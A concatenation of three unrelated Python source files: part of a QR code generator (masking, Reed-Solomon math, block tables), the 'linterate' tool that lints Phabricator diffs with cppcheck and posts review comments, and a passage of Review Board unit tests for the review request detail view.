if maskPattern == QRMaskPattern.PATTERN100 : return (math.floor(i / 2) + math.floor(j / 3) ) % 2 == 0
if maskPattern == QRMaskPattern.PATTERN101 : return (i * j) % 2 + (i * j) % 3 == 0
if maskPattern == QRMaskPattern.PATTERN110 : return ( (i * j) % 2 + (i * j) % 3) % 2 == 0
if maskPattern == QRMaskPattern.PATTERN111 : return ( (i * j) % 3 + (i + j) % 2) % 2 == 0
raise Exception("bad maskPattern:" + maskPattern)
@staticmethod
def getErrorCorrectPolynomial(errorCorrectLength):
a = QRPolynomial([1], 0);
for i in range(errorCorrectLength):
a = a.multiply(QRPolynomial([1, QRMath.gexp(i)], 0) )
return a
@staticmethod
def getLengthInBits(mode, type):
if 1 <= type and type < 10:
# 1 - 9
if mode == QRMode.MODE_NUMBER : return 10
if mode == QRMode.MODE_ALPHA_NUM : return 9
if mode == QRMode.MODE_8BIT_BYTE : return 8
if mode == QRMode.MODE_KANJI : return 8
raise Exception("mode:" + mode)
elif (type < 27):
# 10 - 26
if mode == QRMode.MODE_NUMBER : return 12
if mode == QRMode.MODE_ALPHA_NUM : return 11
if mode == QRMode.MODE_8BIT_BYTE : return 16
if mode == QRMode.MODE_KANJI : return 10
raise Exception("mode:" + mode)
elif (type < 41):
# 27 - 40
if mode == QRMode.MODE_NUMBER : return 14
if mode == QRMode.MODE_ALPHA_NUM : return 13
if mode == QRMode.MODE_8BIT_BYTE : return 16
if mode == QRMode.MODE_KANJI : return 12
raise Exception("mode:" + mode)
else:
raise Exception("type:" + type)
@staticmethod
def getLostPoint(qrCode):
moduleCount = qrCode.getModuleCount();
lostPoint = 0;
# LEVEL1
for row in range(moduleCount):
for col in range(moduleCount):
sameCount = 0;
dark = qrCode.isDark(row, col);
for r in range(-1, 2):
if (row + r < 0 or moduleCount <= row + r):
continue
for c in range(-1, 2):
if (col + c < 0 or moduleCount <= col + c):
continue
if (r == 0 and c == 0):
continue
if (dark == qrCode.isDark(row + r, col + c) ):
sameCount+=1
if (sameCount > 5):
lostPoint += (3 + sameCount - 5)
# LEVEL2
for row in range(moduleCount - 1):
for col in range(moduleCount - 1):
count = 0;
if (qrCode.isDark(row, col ) ): count+=1
if (qrCode.isDark(row + 1, col ) ): count+=1
if (qrCode.isDark(row, col + 1) ): count+=1
if (qrCode.isDark(row + 1, col + 1) ): count+=1
if (count == 0 or count == 4):
lostPoint += 3
# LEVEL3
for row in range(moduleCount):
for col in range(moduleCount - 6):
if (qrCode.isDark(row, col)
and not qrCode.isDark(row, col + 1)
and qrCode.isDark(row, col + 2)
and qrCode.isDark(row, col + 3)
and qrCode.isDark(row, col + 4)
and not qrCode.isDark(row, col + 5)
and qrCode.isDark(row, col + 6) ):
lostPoint += 40
for col in range(moduleCount):
for row in range(moduleCount - 6):
if (qrCode.isDark(row, col)
and not qrCode.isDark(row + 1, col)
and qrCode.isDark(row + 2, col)
and qrCode.isDark(row + 3, col)
and qrCode.isDark(row + 4, col)
and not qrCode.isDark(row + 5, col)
and qrCode.isDark(row + 6, col) ):
lostPoint += 40
# LEVEL4
darkCount = 0;
for col in range(moduleCount):
for row in range(moduleCount):
if (qrCode.isDark(row, col) ):
darkCount+=1
ratio = abs(100 * darkCount / moduleCount / moduleCount - 50) / 5
lostPoint += ratio * 10
return lostPoint
class QRMath:
@staticmethod
def glog(n):
if (n < 1):
raise Exception("glog(" + n + ")")
return LOG_TABLE[n];
@staticmethod
def gexp(n):
while n < 0:
n += 255
while n >= 256:
n -= 255
return EXP_TABLE[n];
EXP_TABLE = [x for x in range(256)]
LOG_TABLE = [x for x in range(256)]
for i in range(8):
EXP_TABLE[i] = 1 << i;
for i in range(8, 256):
EXP_TABLE[i] = EXP_TABLE[i - 4] ^ EXP_TABLE[i - 5] ^ EXP_TABLE[i - 6] ^ EXP_TABLE[i - 8]
for i in range(255):
LOG_TABLE[EXP_TABLE[i] ] = i
class QRPolynomial:
def __init__(self, num, shift):
if (len(num) == 0):
raise Exception(num.length + "/" + shift)
offset = 0
while offset < len(num) and num[offset] == 0:
offset += 1
self.num = [0 for x in range(len(num)-offset+shift)]
for i in range(len(num) - offset):
self.num[i] = num[i + offset]
def get(self, index):
return self.num[index]
def getLength(self):
return len(self.num)
def multiply(self, e):
num = [0 for x in range(self.getLength() + e.getLength() - 1)];
for i in range(self.getLength()):
for j in range(e.getLength()):
num[i + j] ^= QRMath.gexp(QRMath.glog(self.get(i) ) + QRMath.glog(e.get(j) ) )
return QRPolynomial(num, 0);
def mod(self, e):
if (self.getLength() - e.getLength() < 0):
return self;
ratio = QRMath.glog(self.get(0) ) - QRMath.glog(e.get(0) )
num = [0 for x in range(self.getLength())]
for i in range(self.getLength()):
num[i] = self.get(i);
for i in range(e.getLength()):
num[i] ^= QRMath.gexp(QRMath.glog(e.get(i) ) + ratio)
# recursive call
return QRPolynomial(num, 0).mod(e);
class QRRSBlock:
RS_BLOCK_TABLE = [
# L
# M
# Q
# H
# 1
[1, 26, 19],
[1, 26, 16],
[1, 26, 13],
[1, 26, 9],
# 2
[1, 44, 34],
[1, 44, 28],
[1, 44, 22],
[1, 44, 16],
# 3
[1, 70, 55],
[1, 70, 44],
[2, 35, 17],
[2, 35, 13],
# 4
[1, 100, 80],
[2, 50, 32],
[2, 50, 24],
[4, 25, 9],
# 5
[1, 134, 108],
[2, 67, 43],
[2, 33, 15, 2, 34, 16],
[2, 33, 11, 2, 34, 12],
# 6
[2, 86, 68],
[4, 43, 27],
[4, 43, 19],
[4, 43, 15],
# 7
[2, 98, 78],
[4, 49, 31],
[2, 32, 14, 4, 33, 15],
[4, 39, 13, 1, 40, 14],
# 8
[2, 121, 97],
[2, 60, 38, 2, 61, 39],
[4, 40, 18, 2, 41, 19],
[4, 40, 14, 2, 41, 15],
# 9
[2, 146, 116],
[3, 58, 36, 2, 59, 37],
[4, 36, 16, 4, 37, 17],
[4, 36, 12, 4, 37, 13],
# 10
[2, 86, 68, 2, 87, 69],
[4, 69, 43, 1, 70, 44],
[6, 43, 19, 2, 44, 20],
[6, 43, 15, 2, 44, 16],
# 11
[4, 101, 81],
[1, 80, 50, 4, 81, 51],
[4, 50, 22, 4, 51, 23],
[3, 36, 12, 8, 37, 13],
# 12
[2, 116, 92, 2, 117, 93],
[6, 58, 36, 2, 59, 37],
[4, 46, 20, 6, 47, 21],
[7, 42, 14, 4, 43, 15],
# 13
[4, 133, 107],
[8, 59, 37, 1, 60, 38],
[8, 44, 20, 4, 45, 21],
[12, 33, 11, 4, 34, 12],
# 14
[3, 145, 115, 1, 146, 116],
[4, 64, 40, 5, 65, 41],
[11, 36, 16, 5, 37, 17],
[11, 36, 12, 5, 37, 13],
# 15
[5, 109, 87, 1, 110, 88],
[5, 65, 41, 5, 66, 42],
[5, 54, 24, 7, 55, 25],
[11, 36, 12],
# 16
[5, 122, 98, 1, 123, 99],
[7, 73, 45, 3, 74, 46],
[15, 43, 19, 2, 44, 20],
[3, 45, 15, 13, 46, 16],
# 17
[1, 135, 107, 5, 136, 108],
[10, 74, 46, 1, 75, 47],
[1, 50, 22, 15, 51, 23],
[2, 42, 14, 17, 43, 15],
# 18
[5, 150, 120, 1, 151, 121],
[9, 69, 43, 4, 70, 44],
[17, 50, 22, 1, 51, 23],
[2, 42, 14, 19, 43, 15],
# 19
[3, 141, 113, 4, 142, 114],
[3, 70, 44, 11, 71, 45],
[17, 47, 21, 4, 48, 22],
[9, 39, 13, 16, 40, 14],
# 20
[3, 135, 107, 5, 136, 108],
[3, 67, 41, 13, 68, 42],
[15, 54, 24, 5, 55, 25],
[15, 43, 15, 10, 44, 16],
# 21
[4, 144, 116, 4, 145, 117],
[17, 68, 42],
[17, 50, 22, 6, 51, 23],
[19, 46, 16, 6, 47, 17],
# 22
[2, 139, 111, 7, 140, 112],
[17, 74, 46],
[7, 54, 24, 16, 55, 25],
[34, 37, 13],
# 23
[4, 151, 121, 5, 152, 122],
[4, 75, 47, 14, 76, 48],
[11, 54, 24, 14, 55, 25],
[16, 45, 15, 14, 46, 16],
# 24
[6, 147, 117, 4, 148, 118],
[6, 73, 45, 14, 74, 46],
[11, 54, 24, 16, 55, 25],
[30, 46, 16, 2, 47, 17],
# 25
[8, 132, 106, 4, 133, 107],
[8, 75, 47, 13, 76, 48],
[7, 54, 24, 22, 55, 25],
[22, 45, 15, 13, 46, 16],
# 26
[10, 142, 114, 2, 143, 115],
[19, 74, 46, 4, 75, 47],
[28, 50, 22, 6, 51, 23],
[33, 46, 16, 4, 47, 17],
# 27
[8, 152, 122, 4, 153, 123],
[22, 73, 45, 3, 74, 46],
[8, 53, 23, 26, 54, 24],
[12, 45, 15, 28, 46, 16],
# 28
[3, 147, 117, 10, 148, 118],
[3, 73, 45, 23, 74, 46],
[4, 54, 24, 31, 55, 25],
[11, 45, 15, 31, 46, 16],
# 29
[7, 146, 116, 7, 147, 117],
[21, 73, 45, 7, 74, 46],
[1, 53, 23, 37, 54, 24],
[19, 45, 15, 26, 46, 16],
# 30
[5, 145, 115, 10, 146, 116],
[19, 75, 47, 10, 76, 48],
[15, 54, 24, 25, 55, 25],
[23, 45, 15, 25, 46, 16],
# 31
[13, 145, 115, 3, 146, 116],
[2, 74, 46, 29, 75, 47],
[42, 54, 24, 1, 55, 25],
[23, 45, 15, 28, 46, 16],
# 32
[17, 145, 115],
[10, 74, 46, 23, 75, 47],
[10, 54, 24, 35, 55, 25],
[19, 45, 15, 35, 46, 16],
# 33
[17, 145, 115, 1, 146, 116],
[14, 74, 46, 21, 75, 47],
[29, 54, 24, 19, 55, 25],
[11, 45, 15, 46, 46, 16],
# 34
[13, 145, 115, 6, 146, 116],
[14, 74, 46, 23, 75, 47],
[44, 54, 24, 7, 55, 25],
[59, 46, 16, 1, 47, 17],
# 35
[12, 151, 121, 7, 152, 122],
[12, 75, 47, 26, 76, 48],
[39, 54, 24, 14, 55, 25],
[22, 45, 15, 41, 46, 16],
# 36
[6, 151, 121, 14, 152, 122],
[6, 75, 47, 34, 76, 48],
[46, 54, 24, 10, 55, 25],
[2, 45, 15, 64, 46, 16],
# 37
[17, 152, 122, 4, 153, 123],
[29, 74, 46, 14, 75, 47],
[49, 54, 24, 10, 55, 25],
[24, 45, 15, 46, 46, 16],
# 38
[4, 152, 122, 18, 153, 123],
[13, 74, 46, 32, 75, 47],
[48, 54, 24, 14, 55, 25],
[42, 45, 15, 32, 46, 16],
# 39
[20, 147, 117, 4, 148, 118],
[40, 75, 47, 7, 76, 48],
[43, 54, 24, 22, 55, 25],
[10, 45, 15, 67, 46, 16],
# 40
[19, 148, 118, 6, 149, 119],
[18, 75, 47, 31, 76, 48],
[34, 54, 24, 34, 55, 25],
[20, 45, 15, 61, 46, 16]
]
def __init__(self, totalCount, dataCount):
self.totalCount = totalCount
self.dataCount = dataCount
@staticmethod
def getRSBlocks(typeNumber, errorCorrectLevel):
rsBlock = QRRSBlock.getRsBlockTable(typeNumber, errorCorrectLevel);
if rsBlock == None:
raise Exception("bad rs block @ typeNumber:" + typeNumber + "/errorCorrectLevel:" + errorCorrectLevel)
length = len(rsBlock) / 3
list = []
for i in range(length):
count = rsBlock[i * 3 + 0]
totalCount = rsBlock[i * 3 + 1]
dataCount = rsBlock[i * 3 + 2]
for j in range(count):
list.append(QRRSBlock(totalCount, dataCount))
return list;
@staticmethod
def getRsBlockTable(typeNumber, errorCorrectLevel):
if errorCorrectLevel == QRErrorCorrectLevel.L:
return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 0];
elif errorCorrectLevel == QRErrorCorrectLevel.M:
return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 1];
elif errorCorrectLevel == QRErrorCorrectLevel.Q:
return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 2];
elif errorCorrectLevel == QRErrorCorrectLevel.H:
return QRRSBlock.RS_BLOCK_TABLE[(typeNumber - 1) * 4 + 3];
else:
return None;
class QRBitBuffer:
def __init__(self):
self.buffer = []
self.length = 0
def __repr__(self):
return ".".join([str(n) for n in self.buffer])
def get(self, index):
bufIndex = math.floor(index / 8)
val = ( (self.buffer[bufIndex] >> (7 - index % 8) ) & 1) == 1
return ( (self.buffer[bufIndex] >> (7 - index % 8) ) & 1) == 1
def put(self, num, length):
for i in range(length):
self.putBit( ( (num >> (length - i - 1) ) & 1) == 1)
def getLengthInBits(self):
return self.length
def putBit(self, bit):
bufIndex = self.length // 8
if len(self.buffer) <= bufIndex:
self.buffer.append(0)
if bit:
self.buffer[bufIndex] |= (0x80 >> (self.length % 8) )
self.length += 1
|
|
"""linterate - an automated lint excitor.
Download files from differential reviews and apply robust linters to
those files. Where almost certain errors are detected, make inline
comments on those reviews.
This is emphatically not a stand-in for CI, more a utility for getting
developers excited about CI and showing what's possible with some of the
fantastic linters out there.
This improves on 'phlint' by adding configuration options and a memory
of what it's already covered.
"""
# =============================================================================
# CONTENTS
# -----------------------------------------------------------------------------
# lorcmd_linterate
#
# Public Classes:
# BoringErrorFilter
# .filter_ignored
# NovelFileErrorFilter
# .filter_ignored
# .write_seen
# CompositeErrorFilter
# .filter_ignored
#
# Public Functions:
# main
# parse_args
# yield_revisions
# linterate
#
# -----------------------------------------------------------------------------
# (this contents block is generated, edits will be lost)
# =============================================================================
from __future__ import absolute_import
import argparse
import collections
import datetime
import json
import os
import pickle
import phlcon_differential
import phlsys_choice
import phlsys_cppcheck
import phlsys_fs
import phlsys_makeconduit
import phlsys_subprocess
_USAGE_EXAMPLES = """
usage examples:
linterate your default Phabricator instance
$ linterate
"""
_LintResult = collections.namedtuple(
'lorcmd_linterate___LintResult',
['path', 'start_line', 'end_line', 'message'])
def main():
args = parse_args()
conduit = phlsys_makeconduit.make_conduit(args.uri, args.user, args.cert)
error_revisions = []
novel_filter = NovelFileErrorFilter()
error_filter = CompositeErrorFilter(
BoringErrorFilter(),
novel_filter)
try:
for revision in yield_revisions(conduit, args):
linterate(args, conduit, revision, error_revisions, error_filter)
# write new 'seen' errors after linterating, to give a chance for
# the user to ctrl+c and prevent it being recorded
#
# it's pretty slow to write this out, we're doing it every time
# that we've linted files we've downloaded from a webserver though,
# so on balance it might not be so bad.
novel_filter.write_seen()
except phlsys_makeconduit.InsufficientInfoException as e:
print "ERROR - insufficient information"
print e
print
print "N.B. you may also specify uri, user or cert explicitly like so:"
print " --uri URI address of phabricator instance"
print " --user USERNAME username of user to connect as"
print " --cert CERTIFICATE certificate for user Phabrictor account"
return 1
if error_revisions:
print 'revisions with errors:', ' '.join(error_revisions)
else:
print 'no revisions had errors'
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=__doc__,
epilog=_USAGE_EXAMPLES)
parser.add_argument(
'--ids', '-i',
type=int,
nargs='*',
help='list of ids to linterate')
parser.add_argument(
'--silent',
action="store_true",
help='whether to print anything other than errors')
parser.add_argument(
'--non-interactive',
action="store_true",
help='suppress prompts for the user, take no action')
phlsys_makeconduit.add_argparse_arguments(parser)
args = parser.parse_args()
return args
def yield_revisions(conduit, args):
revision_list = phlcon_differential.query(conduit, args.ids)
use_cache = not bool(args.ids)
history = {}
if use_cache:
cache_filename = '.linteratecache'
if os.path.isfile(cache_filename):
with open(cache_filename) as cache_file:
history = json.load(cache_file)
# filter out revisions with nothing new
# be careful to convert revision.id to string or it won't match history
revision_list = filter(
lambda x: set(history.get(x.phid, [])) != set(x.diffs),
revision_list)
for revision in revision_list:
diff = phlcon_differential.get_revision_diff(conduit, revision.id)
with phlsys_fs.chtmpdir_context() as temp_dir:
try:
phlcon_differential.write_diff_files(diff, temp_dir)
except phlcon_differential.WriteDiffError as e:
if not args.silent:
print 'skipping revision ', revision.id, ':', e
else:
yield revision
history[revision.phid] = revision.diffs
if use_cache:
with open(cache_filename, 'w') as cache_file:
json.dump(history, cache_file)
def linterate(args, conduit, revision, error_revisions, error_filter):
if not args.silent:
print revision.id, revision.title
try:
errors = None
if os.path.isdir('right'):
errors = phlsys_cppcheck.run('right')
errors = error_filter.filter_ignored(revision, errors)
if errors:
if args.silent:
print revision.id, revision.title
print phlsys_cppcheck.summarize_results(errors)
print revision.uri
error_revisions.append(str(revision.id))
if not args.non_interactive and phlsys_choice.yes_or_no('comment'):
print "commenting.."
for e in errors:
first_line = min(e.line_numbers)
last_line = max(e.line_numbers)
line_range = last_line - first_line
if line_range > 10:
for line in e.line_numbers:
phlcon_differential.create_inline_comment(
conduit, revision.id, e.path, line, e.message)
else:
phlcon_differential.create_inline_comment(
conduit,
revision.id,
e.path,
first_line,
e.message,
line_count=line_range)
# XXX: only leave draft inline comments for now, so the user
# may review them in context and manually finish the
# comment
#
# message = "LINTERATOR SEE POSSIBLE ERROR"
# phlcon_differential.create_comment(
# conduit, revision.id, message, attach_inlines=True)
print
except phlsys_subprocess.CalledProcessError as e:
if not args.silent:
print ' ', e
class BoringErrorFilter(object):
"""Suppress errors that are uninteresting or high false +ve."""
def __init__(self):
super(BoringErrorFilter, self).__init__()
self._boring_rules = [
# must be an actual error or we're not interested
lambda x: x.severity != 'error',
]
def filter_ignored(self, revision, errors):
_ = revision # NOQA
# filter out any errors that test positive for 'boring'
rules = self._boring_rules
return filter(lambda x: not any(f(x) for f in rules), errors)
class NovelFileErrorFilter(object):
"""Suppress errors for files that we've recently seen errors in."""
def __init__(self):
super(NovelFileErrorFilter, self).__init__()
self._cache_filename = os.path.abspath('.linteratenovelcache')
self._already_seen = {}
self._load_seen()
self._expire_timedelta = datetime.timedelta(days=28)
# forget the expired things and write again
now = datetime.datetime.utcnow()
items = self._already_seen.iteritems()
max_t = self._expire_timedelta
self._already_seen = dict((k, v) for k, v in items if now - v <= max_t)
self.write_seen()
def filter_ignored(self, revision, errors):
new_errors = []
author = revision.authorPHID
author_path_set = set()
for e in errors:
author_path = (author, e.path)
# let it through if we haven't seen it before
if author_path not in self._already_seen:
new_errors.append(e)
author_path_set.add(author_path)
# record each author path and the time right now
for author_path in author_path_set:
self._already_seen[author_path] = datetime.datetime.utcnow()
return new_errors
def _load_seen(self):
if os.path.isfile(self._cache_filename):
with open(self._cache_filename, 'rb') as cache_file:
self._already_seen = pickle.load(cache_file)
def write_seen(self):
with open(self._cache_filename, 'wb') as cache_file:
pickle.dump(self._already_seen, cache_file)
class CompositeErrorFilter(object):
"""Combine multiple error filters into a single one."""
def __init__(self, *args):
super(CompositeErrorFilter, self).__init__()
self._filters = args
def filter_ignored(self, revision, errors):
for f in self._filters:
errors = f.filter_ignored(revision, errors)
return errors
# -----------------------------------------------------------------------------
# Copyright (C) 2013-2014 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------ END-OF-FILE ----------------------------------
|
|
"""Unit tests for reviewboard.reviews.views.ReviewRequestDetailView."""
from datetime import timedelta
from django.contrib.auth.models import User
from django.test.html import parse_html
from djblets.extensions.hooks import TemplateHook
from djblets.extensions.models import RegisteredExtension
from djblets.siteconfig.models import SiteConfiguration
from kgb import SpyAgency
from reviewboard.extensions.base import Extension, get_extension_manager
from reviewboard.reviews.detail import InitialStatusUpdatesEntry, ReviewEntry
from reviewboard.reviews.fields import get_review_request_fieldsets
from reviewboard.reviews.models import Comment, GeneralComment, Review
from reviewboard.site.urlresolvers import local_site_reverse
from reviewboard.testing import TestCase
class ReviewRequestDetailViewTests(SpyAgency, TestCase):
"""Unit tests for reviewboard.reviews.views.ReviewRequestDetailView."""
fixtures = ['test_users', 'test_scmtools', 'test_site']
def test_get(self):
"""Testing ReviewRequestDetailView.get"""
review_request = self.create_review_request(publish=True)
response = self.client.get('/r/%d/' % review_request.id)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['review_request'].pk,
review_request.pk)
def test_context(self):
"""Testing ReviewRequestDetailView context variables"""
# Make sure this request is made while logged in, to catch the
# login-only pieces of the review_detail view.
self.client.login(username='admin', password='admin')
username = 'admin'
summary = 'This is a test summary'
description = 'This is my description'
testing_done = 'Some testing'
review_request = self.create_review_request(
publish=True,
submitter=username,
summary=summary,
description=description,
testing_done=testing_done)
response = self.client.get('/r/%s/' % review_request.pk)
self.assertEqual(response.status_code, 200)
review_request = response.context['review_request']
self.assertEqual(review_request.submitter.username, username)
self.assertEqual(review_request.summary, summary)
self.assertEqual(review_request.description, description)
self.assertEqual(review_request.testing_done, testing_done)
self.assertEqual(review_request.pk, review_request.pk)
def test_diff_comment_ordering(self):
"""Testing ReviewRequestDetailView and ordering of diff comments on a
review
"""
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
comment_text_3 = 'Comment text 3'
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
# Create the users who will be commenting.
user1 = User.objects.get(username='doc')
user2 = User.objects.get(username='dopey')
# Create the master review.
main_review = self.create_review(review_request, user=user1)
main_comment = self.create_diff_comment(main_review, filediff,
text=comment_text_1)
main_review.publish()
# First reply
reply1 = self.create_reply(
main_review,
user=user1,
timestamp=(main_review.timestamp + timedelta(days=1)))
self.create_diff_comment(reply1, filediff, text=comment_text_2,
reply_to=main_comment)
# Second reply
reply2 = self.create_reply(
main_review,
user=user2,
timestamp=(main_review.timestamp + timedelta(days=2)))
self.create_diff_comment(reply2, filediff, text=comment_text_3,
reply_to=main_comment)
# Publish them out of order.
reply2.publish()
reply1.publish()
# Make sure they published in the order expected.
self.assertTrue(reply1.timestamp > reply2.timestamp)
# Make sure they're looked up in the order expected.
comments = list(
Comment.objects
.filter(review__review_request=review_request)
.order_by('timestamp')
)
self.assertEqual(len(comments), 3)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_3)
self.assertEqual(comments[2].text, comment_text_2)
# Now figure out the order on the page.
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
entries = response.context['entries']
initial_entries = entries['initial']
self.assertEqual(len(initial_entries), 1)
self.assertIsInstance(initial_entries[0], InitialStatusUpdatesEntry)
main_entries = entries['main']
self.assertEqual(len(main_entries), 1)
entry = main_entries[0]
self.assertIsInstance(entry, ReviewEntry)
comments = entry.comments['diff_comments']
self.assertEqual(len(comments), 1)
self.assertEqual(comments[0].text, comment_text_1)
replies = comments[0].public_replies()
self.assertEqual(len(replies), 2)
self.assertEqual(replies[0].text, comment_text_3)
self.assertEqual(replies[1].text, comment_text_2)
def test_general_comment_ordering(self):
"""Testing ReviewRequestDetailView and ordering of general comments on
a review
"""
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
comment_text_3 = 'Comment text 3'
review_request = self.create_review_request(create_repository=True,
publish=True)
# Create the users who will be commenting.
user1 = User.objects.get(username='doc')
user2 = User.objects.get(username='dopey')
# Create the master review.
main_review = self.create_review(review_request, user=user1)
main_comment = self.create_general_comment(main_review,
text=comment_text_1)
main_review.publish()
# First reply
reply1 = self.create_reply(
main_review,
user=user1,
timestamp=(main_review.timestamp + timedelta(days=1)))
self.create_general_comment(reply1, text=comment_text_2,
reply_to=main_comment)
# Second reply
reply2 = self.create_reply(
main_review,
user=user2,
timestamp=(main_review.timestamp + timedelta(days=2)))
self.create_general_comment(reply2, text=comment_text_3,
reply_to=main_comment)
# Publish them out of order.
reply2.publish()
reply1.publish()
# Make sure they published in the order expected.
self.assertTrue(reply1.timestamp > reply2.timestamp)
# Make sure they're looked up in the order expected.
comments = list(
GeneralComment.objects
.filter(review__review_request=review_request)
.order_by('timestamp')
)
self.assertEqual(len(comments), 3)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_3)
self.assertEqual(comments[2].text, comment_text_2)
def test_file_attachments_visibility(self):
"""Testing ReviewRequestDetailView default visibility of file
attachments
"""
caption_1 = 'File Attachment 1'
caption_2 = 'File Attachment 2'
caption_3 = 'File Attachment 3'
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
user1 = User.objects.get(username='doc')
review_request = self.create_review_request()
# Add two file attachments. One active, one inactive.
file1 = self.create_file_attachment(review_request, caption=caption_1)
file2 = self.create_file_attachment(review_request, caption=caption_2,
active=False)
review_request.publish(user1)
# Create a third file attachment on a draft.
self.create_file_attachment(review_request, caption=caption_3,
draft=True)
# Create the review with comments for each screenshot.
review = Review.objects.create(review_request=review_request,
user=user1)
review.file_attachment_comments.create(file_attachment=file1,
text=comment_text_1)
review.file_attachment_comments.create(file_attachment=file2,
text=comment_text_2)
review.publish()
# Check that we can find all the objects we expect on the page.
self.client.login(username='doc', password='doc')
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
file_attachments = response.context['file_attachments']
self.assertEqual(len(file_attachments), 2)
self.assertEqual(file_attachments[0].caption, caption_1)
self.assertEqual(file_attachments[1].caption, caption_3)
# Make sure that other users won't see the draft one.
self.client.logout()
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
file_attachments = response.context['file_attachments']
self.assertEqual(len(file_attachments), 1)
self.assertEqual(file_attachments[0].caption, caption_1)
# Make sure we loaded the reviews and all data correctly.
entries = response.context['entries']
initial_entries = entries['initial']
self.assertEqual(len(initial_entries), 1)
self.assertIsInstance(initial_entries[0], InitialStatusUpdatesEntry)
main_entries = entries['main']
self.assertEqual(len(main_entries), 1)
entry = main_entries[0]
self.assertIsInstance(entry, ReviewEntry)
comments = entry.comments['file_attachment_comments']
self.assertEqual(len(comments), 2)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_2)
def test_screenshots_visibility(self):
"""Testing ReviewRequestDetailView default visibility of screenshots"""
caption_1 = 'Screenshot 1'
caption_2 = 'Screenshot 2'
caption_3 = 'Screenshot 3'
comment_text_1 = 'Comment text 1'
comment_text_2 = 'Comment text 2'
user1 = User.objects.get(username='doc')
review_request = self.create_review_request()
# Add two screenshots. One active, one inactive.
screenshot1 = self.create_screenshot(review_request, caption=caption_1)
screenshot2 = self.create_screenshot(review_request, caption=caption_2,
active=False)
review_request.publish(user1)
# Add a third screenshot on a draft.
self.create_screenshot(review_request, caption=caption_3, draft=True)
# Create the review with comments for each screenshot.
user1 = User.objects.get(username='doc')
review = Review.objects.create(review_request=review_request,
user=user1)
review.screenshot_comments.create(screenshot=screenshot1,
text=comment_text_1,
x=10,
y=10,
w=20,
h=20)
review.screenshot_comments.create(screenshot=screenshot2,
text=comment_text_2,
x=0,
y=0,
w=10,
h=10)
review.publish()
# Check that we can find all the objects we expect on the page.
self.client.login(username='doc', password='doc')
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
screenshots = response.context['screenshots']
self.assertEqual(len(screenshots), 2)
self.assertEqual(screenshots[0].caption, caption_1)
self.assertEqual(screenshots[1].caption, caption_3)
# Make sure that other users won't see the draft one.
self.client.logout()
response = self.client.get('/r/%d/' % review_request.pk)
self.assertEqual(response.status_code, 200)
screenshots = response.context['screenshots']
self.assertEqual(len(screenshots), 1)
self.assertEqual(screenshots[0].caption, caption_1)
entries = response.context['entries']
initial_entries = entries['initial']
self.assertEqual(len(initial_entries), 1)
self.assertIsInstance(initial_entries[0], InitialStatusUpdatesEntry)
main_entries = entries['main']
self.assertEqual(len(main_entries), 1)
entry = main_entries[0]
self.assertIsInstance(entry, ReviewEntry)
# Make sure we loaded the reviews and all data correctly.
comments = entry.comments['screenshot_comments']
self.assertEqual(len(comments), 2)
self.assertEqual(comments[0].text, comment_text_1)
self.assertEqual(comments[1].text, comment_text_2)
def test_with_anonymous_and_requires_site_wide_login(self):
"""Testing ReviewRequestDetailView with anonymous user and site-wide
login required
"""
with self.siteconfig_settings({'auth_require_sitewide_login': True},
reload_settings=False):
self.create_review_request(publish=True)
response = self.client.get('/r/1/')
self.assertEqual(response.status_code, 302)
def test_etag_with_issues(self):
"""Testing ReviewRequestDetailView ETags with issue status toggling"""
self.client.login(username='doc', password='doc')
# Some objects we need.
user = User.objects.get(username='doc')
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
# Create a review.
review = self.create_review(review_request, user=user)
comment = self.create_diff_comment(review, filediff,
issue_opened=True)
review.publish()
# Get the etag
response = self.client.get(review_request.get_absolute_url())
self.assertEqual(response.status_code, 200)
etag1 = response['ETag']
self.assertNotEqual(etag1, '')
# Change the issue status
comment.issue_status = Comment.RESOLVED
comment.save()
# Check the etag again
response = self.client.get(review_request.get_absolute_url())
self.assertEqual(response.status_code, 200)
etag2 = response['ETag']
self.assertNotEqual(etag2, '')
# Make sure they're not equal
self.assertNotEqual(etag1, etag2)
def test_review_request_box_template_hooks(self):
"""Testing ReviewRequestDetailView template hooks for the review
request box
"""
class ContentTemplateHook(TemplateHook):
def initialize(self, name, content):
super(ContentTemplateHook, self).initialize(name)
self.content = content
def render_to_string(self, request, context):
return self.content
class TestExtension(Extension):
registration = RegisteredExtension.objects.create(
class_name='test-extension',
name='test-extension',
enabled=True,
installed=True)
extension = TestExtension(get_extension_manager())
review_request = self.create_review_request(publish=True)
hooks = []
for name in ('before-review-request-summary',
'review-request-summary-pre',
'review-request-summary-post',
'after-review-request-summary-post',
'before-review-request-fields',
'after-review-request-fields',
'before-review-request-extra-panes',
'review-request-extra-panes-pre',
'review-request-extra-panes-post',
'after-review-request-extra-panes'):
hooks.append(ContentTemplateHook(extension, name,
'[%s here]' % name))
